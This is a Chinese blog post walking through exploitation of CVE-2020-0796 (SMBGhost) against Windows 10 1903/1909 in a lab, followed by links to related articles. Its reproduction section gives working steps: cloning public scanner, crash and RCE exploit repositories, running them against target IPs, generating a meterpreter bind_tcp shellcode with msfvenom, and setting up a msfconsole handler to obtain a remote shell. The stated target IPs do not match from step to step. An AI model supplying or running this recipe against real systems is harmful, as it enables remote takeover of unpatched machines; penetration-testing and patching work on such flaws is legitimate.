CVE-2020-0796:永恒之黑

最新推荐文章于 2025-05-31 09:00:27 发布
最新推荐文章于 2025-05-31 09:00:27 发布
阅读量1.4k 收藏 12
点赞数 3
CC 4.0 BY-SA版权
文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Foreverlove112/article/details/127130887
本文介绍了一个存在于SMB3.1.1协议中的远程代码执行漏洞,详细解释了漏洞原理及影响范围,并提供了漏洞复现的具体步骤,包括扫描、蓝屏攻击与获取Shell等操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一:漏洞简介

漏洞原理:

SMB远程代码执行漏洞
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

影响范围:

● Windows 10 Version 1903 for 32-bit Systems
● Windows 10 Version 1903 for x64-based Systems
● Windows 10 Version 1903 for ARM64-based Systems
● Windows Server, Version 1903 (Server Core installation)
● Windows 10 Version 1909 for 32-bit Systems
● Windows 10 Version 1909 for x64-based Systems
● Windows 10 Version 1909 for ARM64-based Systems
● Windows Server, Version 1909 (Server Core installation)

二:漏洞复现

环境下载:

Windows 10 教育版Build 10.0.18362
POC扫描工具
POC利用工具
EXP漏洞利用

复现环境:

攻击机:Kali—>192.168.1.125
靶机:Win10—>192.168.1.133

步骤一:扫描漏洞

git clone https://github.com/ollypwn/SMBGhost.git

进入工具目录 输入命令进行扫描

python3 scanner.py 172.18.132.88

在这里插入图片描述

Vulnerable代表目标存在漏洞,可以进行攻击!

步骤二:漏洞利用-蓝屏

目标:使目标主机蓝屏
原理:该脚本连接到目标主机,并在转换头中设置了错误的偏移量字段的情况下压缩了身份验证请求,从而导致解压缩器缓冲溢出并导致目标崩溃。

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git

进入工具目录,输入命令对目标机进行攻击

python3 CVE-2020-0796.py 192.168.1.133

在这里插入图片描述
在这里插入图片描述

步骤三:漏洞利用-Getshell

1:在KALI系统内下载漏洞利用exp

git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

2:使用Msfvenom生成正向连接攻击载荷(木马) 端口为:6666

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -b '\x00' -i 1 -f python

说明: 
   #-p payload
   #-e 编码方式
   #-i 编码次数
   #-b 在生成的程序中避免出现的值
   #LHOST,LPORT 监听上线的主机IP和端口
   #-f exe 生成EXE格式
   #‘\x00‘转义字符,对应ascall码中为null,因为是二进制文件所以会出现,在python中作为结束的标志,有点相当于%00截断的感觉。

在这里插入图片描述

3:用生成的shellcode将工具目录中exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)小诀窍,先整体粘贴复制,然后将buf += 替换为 user_paload,就不用一行一行粘贴了,节省了很多时间。以下是exploit.py替换后的内容:
在这里插入图片描述

4:打开msfconsole监听目标机指定端口[端口:6666]

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6666                      //目标端口
set rhost 172.18.132.88               //目标机ip
run

在这里插入图片描述

5:运行exploit.py脚本,反弹shell

python3 exploit.py -ip 192.168.1.133

在这里插入图片描述

6:msfconsole已经连接到了目标机进行权限维持

在这里插入图片描述
在这里插入图片描述

7:远程链接!
在这里插入图片描述

在这里插入图片描述

Doxi-13A
关注
cve-2020-0796
y@n1n的博客
03-05 302
一.漏洞概述 1.漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受客攻击的目标系统只需开机在线即可能被入侵。 2.影响范围  适用于32位系统的Windows 10版本1903  Windows 10 1903版(用于基于x64的系统)  Windows 10 1903版(用于基于ARM64的系统)  Windows Server 1903版(服务器核
Kali:简单实现永恒的复现,漏洞CVE-2020-0796
2201_75638644的博客
03-12 3160
Kali:简单实现永恒的复现,漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
永恒CVE-2020-0796
m0_57379855的博客
04-01 5390
永恒CVE-2020-0796CVE-2020-0796 永恒漏洞 CVE-2020-0796 永恒漏洞 永恒漏洞与“永恒之蓝”漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。 漏洞危害等级:高危 “永恒”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。 漏洞成因: CVE-2020-0796 漏洞存在于受影响版本的 Windows 驱动
CVE-2020-0796 Windows SMBv3攻击:全面防御指南
最新发布
weixin_42298254的博客
05-31 1095
CVE-2020-0796是一个影响Windows SMBv3服务器和客户端的严重安全漏洞,该漏洞被命名为“SMBGhost”。在2020年3月被公开,漏洞存在于处理压缩数据包的过程中,允许攻击者远程执行代码,从而可能导致系统受到完全控制。微软在随后的安全更新中发布了补丁修复这一漏洞。在本章中,我们将从漏洞发现的背景开始,探讨其普遍性和对网络安全造成的潜在威胁。这一漏洞的严重性在于它几乎影响了所有运行Windows 10版本0903或更高版本的操作系统,包括Windows Server 2019。
CVE-2020-0796
m_de_g的博客
10-08 7062
CVE-2020-0796(永恒) 一.对应出现的版本 永恒的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
CVE-2020-0796-POC.py
03-19
微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaCry等勒索蠕虫利用的可能,攻击者可以构造特定的网页、压缩包、共享目录、Offic文档等多种方式触发漏洞进行攻击,对存在该漏洞的Windows主机造成严重威胁。
【漏洞复现】CVE-2020-0796永恒漏洞复现
热门推荐
qq_45244158的博客
03-29 1万+
文章目录一、漏洞描述二、影响版本三、漏洞检测四、漏洞复现环境五、(1)漏洞利用之蓝屏五、(2)漏洞利用之本地提权五、(3)漏洞利用之反弹shell1、使用msfvenom生成payload2、替换payload3. 开启msf监听模块4. 运行exploit.py脚本,发起攻击反弹shell5. 执行成功,查看监听的地方,成功得到shell六、修复建议1.安装官方补丁2.禁用SMBv3压缩3.设置防火墙策略关闭相关端口4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务 一、漏洞描述.
CVE-2020-0796 POC 永恒 POC SMBGhost POC
10-15
CVE-2020-0796 POC 利用SMBv3远程代码执行漏洞 POC 永恒 POC SMBGhost POC 建议用户及时使用POC自查,如存在漏洞及时进行安全加固
83-83.渗透测试-CVE-2020-0796 永恒漏洞.mp4
05-10
83-83.渗透测试-CVE-2020-0796 永恒漏洞.mp4
永恒CVE-2020-0796
m0_51781051的博客
05-16 473
漏洞成因: CVE-2020-0796 漏洞存在于受影响版本的 Windows 驱动 srv2.sys 中,由于 Windows SMB 更新到 3.1.1 版本增加了对压缩数据的支持,未对用户传输的压缩数据的合法性进行校验。“永恒”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。永恒漏洞与“永恒之蓝”漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。
永恒CVE-2020-0796)漏洞复现
weixin_46463776的博客
04-15 1048
永恒漏洞复现
CVE-2020-0796.py
01-04
CVE-2020-0796的漏洞poc,遵守pocsuite3标准
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
CVE-2020-0796_RCE漏洞
明哥哥知识分享
11-03 451
一、漏洞介绍 微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796 影响范围: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows
cve-2020-0796_CVE20200796(下)
weixin_39921087的博客
11-30 152
动态调试在我们运行POC之前,首先使用windbg对srv2!Srv2DecompressData函数下好断点,时候运行系统,运行POC。程序段下来之后在srvnet!SmbCompressionDecompress函数处下个断点,运行。通过上一篇文章的静态分析我们知道了srvnet!SmbCompressionDecompress的参数如下所示:1.压缩算法ecx1导致最后调用nt!R...
CVE-2020-0796永恒”漏洞复现
longanquan的博客
08-14 2307
永恒2020年报出来的Windows10的系统漏洞 受影响的版本: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based
CVE-2020-0796永恒漏洞复现 超详细过程(成功复现)
unlash的博客
10-20 1万+
CVE-2020-0796永恒漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
win 漏洞CVE-2020-0796
weixin_44664530的博客
05-15 367
受漏洞影响版本: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version
永恒 CVE-2020-0796
qq_46437017的博客
06-20 1075
永恒 CVE-2020-0796漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值